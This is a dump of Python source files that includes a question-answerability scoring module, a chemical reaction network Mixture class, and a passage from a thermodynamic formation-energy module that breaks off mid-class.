text stringlengths 957 885k |
|---|
<filename>nlgeval/pycocoevalcap/answerability/answerability_scorer.py<gh_stars>0
#!/usr/bin/env python
# answerability_scorer.py
import codecs
import json
import logging
import os
import sys
import tempfile
import numpy as np
import six
from six.moves import reload_module
from ..bleu.bleu import Bleu
from ..rouge.rouge import Rouge
#from nlgeval.pycocoevalcap.rouge.rouge import Rouge
from tokenizer.ptbtokenizer import PTBTokenizer
from six.moves import xrange as range
# Python 2 compatibility: restore the ability to set a default string
# encoding so byte/unicode mixing below does not raise. No-op on Python 3
# (six.PY2 is False there).
if six.PY2:
    reload_module(sys)
    sys.setdefaultencoding('utf-8')

# English stop-word list used to strip function words when extracting the
# "important words" of a question. NOTE(review): "have" appears twice in this
# literal; harmless in a set, but flags that the list was hand-maintained.
stop_words = {"did", "have", "ourselves", "hers", "between", "yourself",
              "but", "again", "there", "about", "once", "during", "out", "very",
              "having", "with", "they", "own", "an", "be", "some", "for", "do", "its",
              "yours", "such", "into", "of", "most", "itself", "other", "off", "is", "s",
              "am", "or", "as", "from", "him", "each", "the", "themselves", "until", "below",
              "are", "we", "these", "your", "his", "through", "don", "nor", "me", "were",
              "her", "more", "himself", "this", "down", "should", "our", "their", "while",
              "above", "both", "up", "to", "ours", "had", "she", "all", "no", "at", "any",
              "before", "them", "same", "and", "been", "have", "in", "will", "on", "does",
              "yourselves", "then", "that", "because", "over", "so", "can", "not", "now", "under",
              "he", "you", "herself", "has", "just", "too", "only", "myself", "those", "i", "after",
              "few", "t", "being", "if", "theirs", "my", "against", "a", "by", "doing", "it", "further",
              "was", "here", "than"}

# Interrogative words that mark the "question type" component of a question.
question_words_global = {'What', 'Which', 'Why', 'Who', 'Whom', 'Whose', 'Where', 'When', 'How', 'Is'}
# Add lower-cased variants so matching is effectively case-insensitive for
# these words. (The list comprehension is fully built before update() runs,
# so the set is not mutated while being iterated.)
question_words_global.update([w.lower() for w in question_words_global])
class COCOEvalCap:
    """Thin COCO-style evaluation harness over plain dicts.

    `coco` maps image_id -> reference annotations and `cocoRes` maps
    image_id -> candidate annotations. `evaluate` tokenizes both sides and
    scores them with BLEU (and optionally ROUGE-L), filling `self.eval`
    (corpus-level scores), `self.imgToEval` (per-image scores) and
    `self.evalImgs` (list of the per-image dicts).
    """

    def __init__(self, coco, cocoRes):
        self.evalImgs = []
        self.eval = {}
        self.imgToEval = {}
        self.coco = coco
        self.cocoRes = cocoRes
        self.params = {'image_id': coco.keys()}

    def evaluate(self, ngram_metric):
        """Score `cocoRes` against `coco` with `ngram_metric`; return per-image dicts."""
        image_ids = self.params['image_id']
        gts = {img_id: self.coco[img_id] for img_id in image_ids}
        res = {img_id: self.cocoRes[img_id] for img_id in image_ids}

        # Tokenize both sides identically before scoring.
        tokenizer = PTBTokenizer()
        gts = tokenizer.tokenize(gts)
        res = tokenizer.tokenize(res)

        # Build the scorer list: either ROUGE-L (plus Bleu_1) or a single
        # Bleu_n scorer, where n is parsed out of the metric name.
        if ngram_metric == 'ROUGE_L':
            scorers = [
                (Bleu(1), ["Bleu_1"]),
                (Rouge(), "ROUGE_L"),
            ]
        else:
            assert ngram_metric.startswith('Bleu_')
            order_str = ngram_metric[len('Bleu_'):]
            assert order_str.isdigit()
            order = int(order_str)
            assert order > 0
            scorers = [
                (Bleu(order), ['Bleu_{}'.format(j) for j in range(1, order + 1)]),
            ]

        # Run each scorer and record both corpus-level and per-image scores.
        for scorer, method in scorers:
            score, scores = scorer.compute_score(gts, res)
            if type(method) == list:
                # Bleu returns one score per n-gram order.
                for corpus_score, per_img_scores, metric_name in zip(score, scores, method):
                    self.setEval(corpus_score, metric_name)
                    self.setImgToEvalImgs(per_img_scores, image_ids, metric_name)
            else:
                self.setEval(score, method)
                self.setImgToEvalImgs(scores, image_ids, method)

        self.setEvalImgs()
        return self.evalImgs

    def setEval(self, score, method):
        """Record a corpus-level score under the metric name."""
        self.eval[method] = score

    def setImgToEvalImgs(self, scores, imgIds, method):
        """Record per-image scores, keyed first by image id then metric name."""
        for img_id, img_score in zip(imgIds, scores):
            entry = self.imgToEval.setdefault(img_id, {})
            entry["image_id"] = img_id
            entry[method] = img_score

    def setEvalImgs(self):
        """Flatten the per-image score dicts into a list."""
        self.evalImgs = list(self.imgToEval.values())
class AnswerabilityScorer(object):
    """Q-BLEU style "answerability" metric for generated questions.

    Each question is decomposed into components: important (content) words,
    named entities (capitalized tokens), question type (wh-word), stop words,
    and the full question itself. Component-wise F-scores (Bleu_1 based) are
    combined with an n-gram fluency score into a single answerability score.

    Fix in this revision: `loadJsonToMap` previously stored
    `image_id=entry['caption']` (the caption duplicated into the id field);
    it now stores `entry['image_id']` as intended.
    """

    def __init__(self, ngram_metric):
        # Fluency metric name, e.g. "Bleu_4" or "ROUGE_L".
        self.ngram_metric = ngram_metric

    def remove_stopwords_and_NER_line(self, question, relevant_words=None, question_words=None):
        """Extract the "important words" of a question.

        With relevant_words=None: drops question-type words (plus the token
        following "what"/"which"), capitalized tokens and stop words, and
        returns what remains, space-joined. Otherwise returns only the tokens
        containing one of `relevant_words` (case-insensitive substring match).
        """
        if relevant_words is None:
            tokens = question.split()
            if question_words is None:
                question_words = question_words_global
            type_words = []
            for word in question_words:
                for i, w in enumerate(tokens):
                    if w == word:
                        type_words.append(w)
                        # If the question type is 'what' or 'which', the following
                        # word is generally associated with the answer type, so it
                        # is treated as part of the question type as well.
                        if i + 1 < len(tokens) and (w.lower() == "what" or w.lower() == "which"):
                            type_words.append(tokens[i + 1])
            remaining = [item for item in tokens if item not in type_words]
            important = []
            for tok in remaining:
                # Capitalized tokens are assumed to be named entities and are
                # handled separately by NER_line; stop words carry no content.
                if tok[0].isupper() == False:
                    if tok not in stop_words:
                        important.append(tok)
            return " ".join(important)
        else:
            kept = []
            for tok in question.split():
                for rel in relevant_words:
                    if rel.lower() in tok:
                        kept.append(tok)
            return " ".join(kept)

    def NER_line(self, question):
        """Return the capitalized (named-entity-like) tokens of a question,
        skipping a leading question-type word."""
        tokens = question.split()
        if tokens[0].lower() in question_words_global:
            tokens = tokens[1:]
        return " ".join(tok for tok in tokens if tok[0].isupper())

    def get_stopwords(self, question):
        """Return the lower-cased stop words of a question, space-joined."""
        return " ".join(tok.lower() for tok in question.split()
                        if tok.lower() in stop_words)

    def loadJsonToMap(self, json_file):
        """Load a COCO-style annotation JSON file into image_id -> [annotation].

        Each annotation keeps its caption and image_id.
        """
        with codecs.open(json_file, "r", encoding="utf-8", errors="ignore") as f:
            data = json.load(f)
        img_to_anns = {}
        for entry in data:
            if entry['image_id'] not in img_to_anns:
                img_to_anns[entry['image_id']] = []
            # Bug fix: image_id must come from entry['image_id'],
            # not entry['caption'].
            summary = dict(caption=entry['caption'], image_id=entry['image_id'])
            img_to_anns[entry['image_id']].append(summary)
        return img_to_anns

    def questiontype(self, question, questiontypes=None):
        """Return the question-type words of a question.

        With questiontypes=None, matches against the global wh-word set
        (including the token after "what"/"which"). Otherwise returns the
        first prefix of `questiontypes` the question starts with, or " ".
        """
        if questiontypes is None:
            tokens = question.strip().split()
            type_words = []
            for word in question_words_global:
                for i, w in enumerate(tokens):
                    if w == word:
                        type_words.append(w)
                        if i + 1 < len(tokens) and (w.lower() == "what" or w.lower() == "which"):
                            type_words.append(tokens[i + 1])
            return " ".join(type_words)
        else:
            for prefix in questiontypes:
                if question.startswith(prefix + " "):
                    return prefix
            return " "

    def _get_json_format_qbleu(self, lines, output_path_prefix, relevant_words=None, questiontypes=None):
        """Split each question into its components and dump five COCO-style
        JSON files (important words, NER, question type, full question,
        stop words). Returns the list of file paths, in that order.
        """
        if not os.path.exists(os.path.dirname(output_path_prefix)):
            os.makedirs(os.path.dirname(output_path_prefix))
        name = output_path_prefix + '_components'

        pred_sents_impwords = []
        pred_sents_ner = []
        pred_sents_qt = []
        pred_sents_sw = []
        for line in lines:
            pred_sents_impwords.append(self.remove_stopwords_and_NER_line(line, relevant_words))
            pred_sents_ner.append(self.NER_line(line))
            pred_sents_qt.append(self.questiontype(line, questiontypes))
            pred_sents_sw.append(self.get_stopwords(line))

        # Order matters: calc_score indexes these as
        # 0=impwords, 1=ner, 2=qt, 3=fluent (full question), 4=sw.
        ref_files = [name + "_impwords", name + "_ner", name + "_qt",
                     name + "_fluent", name + "_sw"]

        data_pred_impwords = []
        data_pred_qt = []
        data_pred_ner = []
        data_pred = []
        data_pred_sw = []
        for index, sent in enumerate(pred_sents_impwords):
            data_pred_impwords.append(dict(image_id=index, caption=sent))
            data_pred_qt.append(dict(image_id=index, caption=pred_sents_qt[index]))
            data_pred_ner.append(dict(image_id=index, caption=pred_sents_ner[index]))
            data_pred.append(dict(image_id=index, caption=lines[index]))
            data_pred_sw.append(dict(image_id=index, caption=pred_sents_sw[index]))

        for path, payload in zip(ref_files, [data_pred_impwords, data_pred_ner,
                                             data_pred_qt, data_pred,
                                             data_pred_sw]):
            with open(path, 'w') as f:
                json.dump(payload, f, separators=(',', ':'))
        return ref_files

    def compute_answerability_scores(self, all_scores, ner_weight, qt_weight, re_weight, d, output_dir, ngram_metric="Bleu_4"):
        """Combine per-line component scores into mean answerability/fluency.

        answerability = re*imp + ner*ner + qt*qt + (1-re-ner-qt)*sw
        final         = d*answerability + (1-d)*fluency
        Returns (mean final score, mean fluency score).
        """
        fluent_scores = [x[ngram_metric] for x in all_scores]
        imp_scores = [x['imp'] for x in all_scores]
        qt_scores = [x['qt'] for x in all_scores]
        sw_scores = [x['sw'] for x in all_scores]
        ner_scores = [x['ner'] for x in all_scores]

        new_scores = []
        for i in range(len(imp_scores)):
            answerability = re_weight * imp_scores[i] + ner_weight * ner_scores[i] + \
                qt_weight * qt_scores[i] + (1 - re_weight - ner_weight - qt_weight) * sw_scores[i]
            new_scores.append(d * answerability + (1 - d) * fluent_scores[i])

        return np.mean(new_scores), np.mean(fluent_scores)

    def calc_score(self, hypotheses, references):
        """Score parallel lists of hypothesis/reference questions.

        Returns (mean answerability score, mean fluency score).
        """
        ngram_metric = self.ngram_metric
        # Component interpolation weights from the Q-BLEU paper (SQuAD setting).
        ner_weight = 0.6
        qt_weight = 0.2
        re_weight = 0.1
        delta = 0.7
        relevant_words = None
        question_words = None
        output_dir = tempfile.gettempdir()

        filenames_1 = self._get_json_format_qbleu(references, os.path.join(output_dir, 'refs'),
                                                  relevant_words, question_words)
        filenames_2 = self._get_json_format_qbleu(hypotheses, os.path.join(output_dir, 'hyps'),
                                                  relevant_words, question_words)

        final_eval = []
        final_eval_f = []
        for file_1, file_2 in zip(filenames_1, filenames_2):
            coco = self.loadJsonToMap(file_1)
            os.remove(file_1)
            cocoRes = self.loadJsonToMap(file_2)
            os.remove(file_2)
            # Precision: hypotheses scored against references; recall: swapped.
            cocoEval_precision = COCOEvalCap(coco, cocoRes)
            cocoEval_recall = COCOEvalCap(cocoRes, coco)
            cocoEval_precision.params['image_id'] = cocoRes.keys()
            cocoEval_recall.params['image_id'] = cocoRes.keys()
            eval_per_line_p = cocoEval_precision.evaluate(ngram_metric)
            eval_per_line_r = cocoEval_recall.evaluate(ngram_metric)

            # Per-line Bleu_1 F-score from precision/recall, guarding
            # against division by zero when both are 0.
            temp_f = []
            for p, r in zip(eval_per_line_p, eval_per_line_r):
                if p['Bleu_1'] + r['Bleu_1'] == 0:
                    temp_f.append(0)
                    continue
                temp_f.append(2 * (p['Bleu_1'] * r['Bleu_1']) / (p['Bleu_1'] + r['Bleu_1']))
            final_eval_f.append(temp_f)
            final_eval.append(eval_per_line_p)

        # Index 3 = full-question ("fluent") precision scores; only the n-gram
        # metric key is read here, so only BLEU/ROUGE_L are supported.
        metric_scores = [fl[ngram_metric] for fl in final_eval[3]]

        save_all = []
        for imp, ner, qt, sw, metric_score in zip(final_eval_f[0], final_eval_f[1],
                                                  final_eval_f[2], final_eval_f[4],
                                                  metric_scores):
            save_all.append({'imp': imp, 'ner': ner, 'qt': qt, 'sw': sw,
                             ngram_metric: metric_score})

        return self.compute_answerability_scores(save_all, ner_weight, qt_weight,
                                                 re_weight, delta, output_dir, ngram_metric)

    def compute_score(self, gts, res):
        """COCO-eval style entry point; only single-reference is supported.

        Returns (mean answerability score, mean fluency score) — note this
        differs from other scorers, which return (score, per-image scores).
        """
        assert gts.keys() == res.keys()
        ground_truths = []
        hypotheses = []
        for img_id in gts.keys():
            hypotheses.append(res[img_id][0])
            ground_truths.append(gts[img_id][0])
        average_answerability_score, average_fluent_score = self.calc_score(hypotheses, ground_truths)
        return average_answerability_score, average_fluent_score
|
# Copyright (c) 2020, Build-A-Cell. All rights reserved.
# See LICENSE file in the project root directory for details.
import copy
from typing import List, Union
from warnings import resetwarnings, warn
from .chemical_reaction_network import ChemicalReactionNetwork
from .component import Component
from .global_mechanism import GlobalMechanism
from .mechanism import Mechanism
from .parameter import ParameterDatabase
from .reaction import Reaction
from .species import Species
class Mixture(object):
    """Container tying together Components, Mechanisms and parameters.

    A Mixture object holds together all the components (DNA, Protein, etc.),
    mechanisms (Transcription, Translation), and parameters related to the
    mixture itself (e.g. transcription rate). Default components and
    mechanisms can be added, as well as global mechanisms that impact all
    species (e.g. cell growth). Calling compile_crn() produces a
    ChemicalReactionNetwork from the mixture's contents.

    Fixes in this revision:
    - add_global_mechanism checked for duplicates in self._mechanisms instead
      of self._global_mechanisms, so global-mechanism duplicates were never
      detected (and unrelated mechanism types falsely collided).
    - apply_global_mechanisms was annotated as returning a tuple but returns
      None.
    - "Recieved"/"Recievied" typos in error messages corrected.
    """

    def __init__(self, name="", mechanisms=None, components=None, parameters=None, parameter_file=None,
                 global_mechanisms=None, species=None, initial_condition_dictionary=None, **kwargs):
        """Create a Mixture.

        :param name: name of the mixture
        :param mechanisms: dictionary of mechanisms
        :param components: list of Components in the mixture
        :param parameters: dictionary of parameters (see parameter documentation for keys)
        :param parameter_file: parameters can also be loaded from a file
        :param global_mechanisms: dict of global mechanisms that impact all species (e.g. cell growth)
        :param species: extra Species (or list of Species) to include in the CRN
        :param initial_condition_dictionary: overrides initial amounts, component.name --> initial amount
        """
        self.name = name  # Save the name of the mixture

        # Process the components. The hasattr checks let subclasses pre-set
        # defaults before calling this constructor.
        # NOTE(review): if components is None but _components already exists,
        # add_components(None) raises — confirm this is intended for subclasses.
        if components is None and not hasattr(self, "_components"):
            self.components = []
        else:
            self.add_components(components)

        # Process mechanisms.
        if mechanisms is None and not hasattr(self, "_mechanisms"):
            self.mechanisms = {}
        else:
            self.add_mechanisms(mechanisms)

        # Process global mechanisms. Global mechanisms are applied just once
        # to ALL species generated from components inside a mixture. They
        # should be used rarely, and with care; an example use case is
        # degradation via dilution. add_mechanisms dispatches GlobalMechanism
        # instances to add_global_mechanism.
        if global_mechanisms is None and not hasattr(self, "_global_mechanisms"):
            self.global_mechanisms = {}
        else:
            self.add_mechanisms(global_mechanisms)

        # Process the extra species.
        self.add_species(species)

        # Create a parameter database.
        self.parameter_database = ParameterDatabase(parameter_file = parameter_file, parameter_dictionary = parameters, **kwargs)

        # Initial conditions are searched for by default in the parameter file
        # (see Mixture.set_initial_condition). They can be overloaded with an
        # initial_condition_dictionary: component.name --> initial amount.
        if initial_condition_dictionary is None:
            self.initial_condition_dictionary = {}
        else:
            self.initial_condition_dictionary = dict(initial_condition_dictionary)

        # The CRN is stored here during compilation.
        self.crn = None

    def add_species(self, species: Union[List[Species], Species]):
        """Add extra Species (beyond those produced by Components) to the mixture."""
        if not hasattr(self, "added_species"):
            self.added_species = []
        if species is not None:
            if not isinstance(species, list):
                species_list = [species]
            else:
                species_list = species
            assert all(isinstance(x, Species) for x in species_list), 'only Species type is accepted!'
            self.added_species += species_list

    def set_species(self, species: Union[Species, str], material_type=None, attributes=None):
        """Normalize a species given as a string, Species, or Component.

        :param species: name of a species, a Species instance, or a Component
        :param material_type: material type of the species as a string
        :param attributes: Species attributes
        :return: Species instance
        """
        if isinstance(species, Species):
            return species
        elif isinstance(species, str):
            return Species(name=species, material_type=material_type, attributes=attributes)
        elif isinstance(species, Component) and species.get_species() is not None:
            return species.get_species()
        else:
            raise ValueError("Invalid Species: string, chemical_reaction_network.Species or Component with implemented .get_species() required as input.")

    @property
    def components(self):
        """List of Components in the Mixture (copies of the originals)."""
        return self._components

    @components.setter
    def components(self, components):
        self._components = []
        self.add_components(components)

    def add_component(self, component):
        """Add a single Component (deep-copied) to the mixture.

        Raises ValueError if a Component of the same type and name is
        already present.
        """
        if not hasattr(self, "_components"):
            self.components = []

        if isinstance(component, list):
            self.add_components(component)
        else:
            assert isinstance(component, Component), "the object: %s passed into mixture as component must be of the class Component" % str(component)
            # Check if component is already in self._components
            # (for-else: the else branch runs only if no duplicate raised).
            for comp in self._components:
                if type(comp) == type(component) and comp.name == component.name:
                    raise ValueError(f"{comp} of the same type and name already in Mixture!")
            else:
                # Components are copied before being added to Mixtures
                component_copy = copy.deepcopy(component)
                component_copy.set_mixture(self)
                self.components.append(component_copy)

    def get_mechanism(self, mechanism_type):
        """Search the Mixture for a Mechanism of the given type.

        :return: the Mechanism, or None if not found.
        """
        if not isinstance(mechanism_type, str):
            raise TypeError(f"mechanism_type must be a string. Received {mechanism_type}.")
        if mechanism_type in self.mechanisms:
            return self.mechanisms[mechanism_type]
        else:
            return None

    def add_components(self, components: Union[List[Component], Component]):
        """Add a Component or a list of Components to the mixture."""
        if isinstance(components, Component):
            self.add_component(components)
        elif isinstance(components, List):
            for component in components:
                self.add_component(component)
        else:
            raise ValueError(f"add_components expected a list of Components. Received {components}")

    def get_component(self, component=None, name=None, index=None):
        """Get components from Mixture._components.

        Exactly one of the 3 keywords must not be None.
        :param component: a Component instance; matched by type and name
        :param name: str; matched by name
        :param index: int; returns Mixture._components[index]
        :return: None if nothing is found, the single match, or a list of matches.
        """
        if [component, name, index].count(None) != 2:
            raise ValueError(f"get_component requires a single keyword. Received component={component}, name={name}, index={index}.")
        if not (isinstance(component, Component) or component is None):
            raise ValueError(f"component must be of type Component. Received {component}.")
        if not (isinstance(name, str) or name is None):
            raise ValueError(f"name must be of type str. Received {name}.")
        if not (isinstance(index, int) or index is None):
            raise ValueError(f"index must be of type int. Received {index}.")

        matches = []
        if index is not None:
            matches.append(self.components[index])
        else:
            for comp in self.components:
                if component is not None:
                    if type(comp) == type(component) and comp.name == component.name:
                        matches.append(comp)
                elif name is not None:
                    if comp.name == name:
                        matches.append(comp)
        if len(matches) == 0:
            return None
        elif len(matches) == 1:
            return matches[0]
        else:
            warn("get_component found multiple matching components. A list has been returned.")
            return matches

    @property
    def mechanisms(self):
        """mechanisms stores Mixture Mechanisms."""
        return self._mechanisms

    @mechanisms.setter
    def mechanisms(self, mechanisms):
        self._mechanisms = {}
        self.add_mechanisms(mechanisms, overwrite=True)

    def add_mechanism(self, mechanism, mech_type=None, overwrite=False):
        """Add a mechanism of type mech_type to the Mixture mechanism dictionary.

        GlobalMechanism instances are dispatched to add_global_mechanism.
        :param mechanism: a Mechanism instance
        :param mech_type: the type of mechanism; defaults to mechanism.mechanism_type
        :param overwrite: whether to overwrite existing mechanisms of the same type (default False)
        """
        if not hasattr(self, "_mechanisms"):
            self._mechanisms = {}

        if not isinstance(mechanism, Mechanism):
            raise TypeError(f"mechanism must be a Mechanism. Received {mechanism}.")
        if mech_type is None:
            mech_type = mechanism.mechanism_type
        if not isinstance(mech_type, str):
            raise TypeError(f"mechanism keys must be strings. Received {mech_type}")

        if isinstance(mechanism, GlobalMechanism):
            self.add_global_mechanism(mechanism, mech_type, overwrite)
        elif isinstance(mechanism, Mechanism):
            if mech_type in self._mechanisms and not overwrite:
                raise ValueError(f"mech_type {mech_type} already in Mixture {self}. To overwrite, use keyword overwrite = True.")
            else:
                # Mechanisms are copied so Mixtures do not share mutable state.
                self._mechanisms[mech_type] = copy.deepcopy(mechanism)

    def add_mechanisms(self, mechanisms, overwrite=False):
        """Add a Mechanism, list of Mechanisms, or dict of Mechanisms.

        Accepts both GlobalMechanisms and Mechanisms.
        :param mechanisms: Mechanism / list / dict {mech_type: Mechanism}
        :param overwrite: whether to overwrite existing mechanisms of the same type (default False)
        """
        if isinstance(mechanisms, Mechanism):
            self.add_mechanism(mechanisms, overwrite = overwrite)
        elif isinstance(mechanisms, dict):
            for mech_type in mechanisms:
                self.add_mechanism(mechanisms[mech_type], mech_type, overwrite = overwrite)
        elif isinstance(mechanisms, list):
            for mech in mechanisms:
                self.add_mechanism(mech, overwrite = overwrite)
        else:
            raise ValueError(f"add_mechanisms expected a list of Mechanisms. Received {mechanisms}")

    @property
    def global_mechanisms(self):
        """global_mechanisms stores global Mechanisms in the Mixture."""
        return self._global_mechanisms

    @global_mechanisms.setter
    def global_mechanisms(self, mechanisms):
        self._global_mechanisms = {}
        if isinstance(mechanisms, dict):
            for mech_type in mechanisms:
                self.add_global_mechanism(mechanisms[mech_type], mech_type, overwrite = True)
        elif isinstance(mechanisms, list):
            for mech in mechanisms:
                self.add_global_mechanism(mech, overwrite = True)

    def add_global_mechanism(self, mechanism, mech_type = None, overwrite = False):
        """Add a mechanism of type mech_type to the Mixture global_mechanism dictionary.

        :param mechanism: a GlobalMechanism instance
        :param mech_type: the type of mechanism; defaults to mechanism.mechanism_type
        :param overwrite: whether to overwrite existing mechanisms of the same type (default False)
        """
        if not hasattr(self, "_global_mechanisms"):
            self._global_mechanisms = {}

        if not isinstance(mechanism, GlobalMechanism):
            raise TypeError(f"mechanism must be a GlobalMechanism. Received {mechanism}.")
        if mech_type is None:
            mech_type = mechanism.mechanism_type
        if not isinstance(mech_type, str):
            raise TypeError(f"mechanism keys must be strings. Received {mech_type}")

        # Bug fix: duplicates must be checked in the *global* mechanism
        # dictionary, not in self._mechanisms.
        if mech_type in self._global_mechanisms and not overwrite:
            raise ValueError(f"mech_type {mech_type} already in Mixture {self}. To overwrite, use keyword overwrite = True.")
        else:
            self._global_mechanisms[mech_type] = copy.deepcopy(mechanism)

    def update_parameters(self, parameter_file = None, parameters = None, overwrite_parameters = True):
        """Load additional parameters from a file and/or dictionary."""
        if parameter_file is not None:
            self.parameter_database.load_parameters_from_file(parameter_file, overwrite_parameters = overwrite_parameters)
        if parameters is not None:
            self.parameter_database.load_parameters_from_dictionary(parameters, overwrite_parameters = overwrite_parameters)

    def get_parameter(self, mechanism, part_id, param_name):
        """Look up a parameter in the Mixture's ParameterDatabase."""
        param = self.parameter_database.find_parameter(mechanism, part_id, param_name)
        return param

    def set_initial_condition(self, s: Species, component=None):
        """Set s.initial_concentration using the parameter hierarchy.

        1. the Component's initial-concentration dictionary / ParameterDatabase
        2. (self.name, repr(s)) in self.initial_condition_dictionary
        3. repr(s) in self.initial_condition_dictionary
        4. if s == component.get_species(): (self.name, component.name) in self.initial_condition_dictionary
        5. if s == component.get_species(): component.name in self.initial_condition_dictionary
        6. (None, self.name, repr(s)) in self.parameter_database
        7. repr(s) in self.parameter_database
        8. if s == component.get_species(): (None, self.name, component.name) in self.parameter_database
        9. if s == component.get_species(): component.name in self.parameter_database
        10. defaults to 0

        :param s: the Species whose initial concentration is being set
        :param component: the Component that produced s, if any
        """
        if not isinstance(s, Species):
            raise ValueError(f"{s} is not a Species! Can only set initial concentration of a Species.")

        init_conc = None
        #1
        if component is not None:
            init_conc = component.get_initial_condition(s)

        if init_conc is None:
            #2
            if (self.name, repr(s)) in self.initial_condition_dictionary:
                init_conc = self.initial_condition_dictionary[(self.name, repr(s))]
            #3
            elif repr(s) in self.initial_condition_dictionary:
                init_conc = self.initial_condition_dictionary[repr(s)]
            #4
            elif component is not None and component.get_species() == s and (self.name, component.name) in self.initial_condition_dictionary:
                return self.initial_condition_dictionary[(self.name, component.name)]
            #5
            elif component is not None and component.get_species() == s and component.name in self.initial_condition_dictionary:
                return self.initial_condition_dictionary[component.name]
            #6
            elif self.parameter_database.find_parameter(None, self.name, repr(s)) is not None:
                init_conc = self.parameter_database.find_parameter(None, self.name, repr(s)).value
            #7
            elif self.parameter_database.find_parameter(None, None, repr(s)) is not None:
                init_conc = self.parameter_database.find_parameter(None, None, repr(s)).value
            #8
            elif component is not None and component.get_species() == s and (None, self.name, component.name) in self.parameter_database:
                return self.parameter_database.find_parameter(None, self.name, component.name).value
            #9
            elif component is not None and component.get_species() == s and component.name in self.parameter_database:
                return self.parameter_database.find_parameter(None, None, component.name).value
            #10
            else:
                init_conc = 0

        s.initial_concentration = init_conc

    def add_species_to_crn(self, new_species, component):
        """Add Species (or nested lists of Species) to self.crn, setting
        their initial conditions along the way."""
        if self.crn is None:
            self.crn = ChemicalReactionNetwork(species = [], reactions = [])

        if isinstance(new_species, Species):
            new_species = [new_species]

        for s in new_species:
            if isinstance(s, Species):
                self.set_initial_condition(s, component)
                self.crn.add_species(s)
            elif isinstance(s, list) and (all(isinstance(ss, Species) for ss in s) or len(s) == 0):
                for ss in s:
                    self.set_initial_condition(ss, component)
                self.crn.add_species(s)
            elif s is not None:
                raise ValueError(f"Invalid Species Returned in {component}.update_species(): {s}.")

    def apply_global_mechanisms(self, species) -> None:
        """Apply every global mechanism to `species`, adding the resulting
        species and reactions to self.crn."""
        global_mech_species = []
        global_mech_reactions = []
        if self.global_mechanisms:
            for mech in self.global_mechanisms:
                # Update Global Mechanisms
                global_mech_species += self.global_mechanisms[mech].update_species_global(species, self)
                global_mech_reactions += self.global_mechanisms[mech].update_reactions_global(species, self)

        self.add_species_to_crn(global_mech_species, component = None)
        self.crn.add_reactions(global_mech_reactions)

    def compile_crn(self) -> ChemicalReactionNetwork:
        """Create a ChemicalReactionNetwork from the species and reactions
        associated with this mixture.

        :return: ChemicalReactionNetwork
        """
        resetwarnings()  # Reset warnings - better to toggle them off manually.

        # Reset the Components' mixture to self, in case they have been added
        # to other Mixtures since.
        for c in self.components:
            c.set_mixture(self)

        # Create a fresh CRN to filter out duplicate species.
        self.crn = ChemicalReactionNetwork([], [])

        # Add the extra species to the CRN.
        self.add_species_to_crn(self.added_species, component = None)

        # Append Species from each Component.
        for component in self.components:
            self.add_species_to_crn(component.update_species(), component)

        # Append Reactions from each Component.
        for component in self.components:
            self.crn.add_reactions(component.update_reactions())

        # Global mechanisms are applied last, and only once, to all species;
        # the resulting reactions and species are added to the CRN.
        self.apply_global_mechanisms(self.crn.species)

        return self.crn

    def __str__(self):
        return type(self).__name__ + ': ' + self.name

    def __repr__(self):
        txt = str(self)+"\n"
        if self.components:
            txt += "Components = ["
            for comp in self.components:
                txt+="\n\t"+str(comp)
        if self.mechanisms:
            txt+=" ]\nMechanisms = {"
            for mech in self.mechanisms:
                txt+="\n\t"+mech+":"+self.mechanisms[mech].name
        if self.global_mechanisms:
            txt+=" }\nGlobal Mechanisms = {"
            for mech in self.global_mechanisms:
                txt+="\n\t"+mech+":"+self.global_mechanisms[mech].name
        txt+=" }"
        return txt
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 6 15:47:09 2017
@author: noore
"""
import logging
from numpy import matrix, array, load, zeros, logaddexp, sqrt, log
import os
import json
import gzip
import types
import re
# Data files shipped alongside this module.
COMPOUND_JSON_FNAME = 'cc_compounds.json.gz'   # per-compound formation-energy data
PREPROCESS_FNAME = 'cc_preprocess.npz'         # precomputed matrices for uncertainty estimation

# Physical constants and default conditions for the Legendre transform.
R = 8.31e-3 # kJ/(K*mol)
DEFAULT_TEMP = 298.15 # K
DEFAULT_IONIC_STRENGTH = 0.1 # mM
DEFAULT_PH = 7.0
DEFAULT_PMG = 14.0
DEFAULT_PHASE = 'aqueous'
RT = R * DEFAULT_TEMP          # kJ/mol
RTlog10 = RT * log(10)         # kJ/mol per pH/pMg unit
# Extended Debye-Hueckel parameters for the ionic-strength correction.
DEBYE_HUECKLE_A = 2.91482
DEBYE_HUECKLE_B = 1.6
MG_FORMATION_ENERGY = -455.3 # kJ/mol, formation energy of Mg2+
class Species(object):
    """A single pseudoisomer (microspecies) of a compound.

    Wraps one entry of a compound's pseudoisomer map: formation energy
    (dG0_f), phase, proton count (nH), magnesium count (nMg) and charge (z).
    """

    def __init__(self, d):
        # Pull the required fields out of the raw dictionary, in a fixed order.
        for attr in ('dG0_f', 'phase', 'nH', 'nMg', 'z'):
            setattr(self, attr, d[attr])

    def ddG_prime(self, pH, pMg, I):
        """
        Transform this individual estimate to difference conditions.
        """
        sqrt_I = sqrt(I)
        correction = 0
        # potential related to the pH
        if self.nH > 0:
            correction += self.nH * RTlog10 * pH
        # potential related to the ionic strength (extended Debye-Hueckel)
        correction -= DEBYE_HUECKLE_A * (self.z ** 2 - self.nH) * sqrt_I / (1.0 + DEBYE_HUECKLE_B * sqrt_I)
        # potential related to the Mg ions
        if self.nMg > 0:
            correction += self.nMg * (RTlog10 * pMg - MG_FORMATION_ENERGY)
        return correction

    def dG0_prime(self, pH, pMg, I):
        """
        Transform this individual estimate to difference conditions.
        """
        transformed = self.dG0_f + self.ddG_prime(pH, pMg, I)
        logging.info('nH = %2d, nMg = %2d, z = %2d, dG0_f = %6.1f -> dG\'0_f = %6.1f' %
                     (self.nH, self.nMg, self.z, self.dG0_f, transformed))
        return transformed
class Compound(object):
    """A compound with its pseudoisomer species and group decomposition.

    Built from a raw dictionary (one entry of the compound JSON file).
    NOTE: this module targets Python 2 — `map` below returns a list there,
    and later code indexes and re-iterates `species_list`.
    """

    def __init__(self, d):
        get = d.get
        self.inchi = get('InChI', '')
        self.kegg_id = d['CID']
        self.compound_index = get('compound_index', -1)
        self.group_vector = get('group_vector', None)
        self.formula = get('formula', '')
        self.mass = get('mass', -1)
        self.num_electrons = get('num_electrons', 0)
        self.no_dg_explanation = get('error', '')
        if 'pmap' in d:
            pmap = d['pmap']
            self.source = pmap.get('source', '')
            self.species_list = map(Species, pmap.get('species', []))
            # The compound phase is aqueous unless a single non-aqueous
            # species defines it; multiple species in a non-aqueous phase
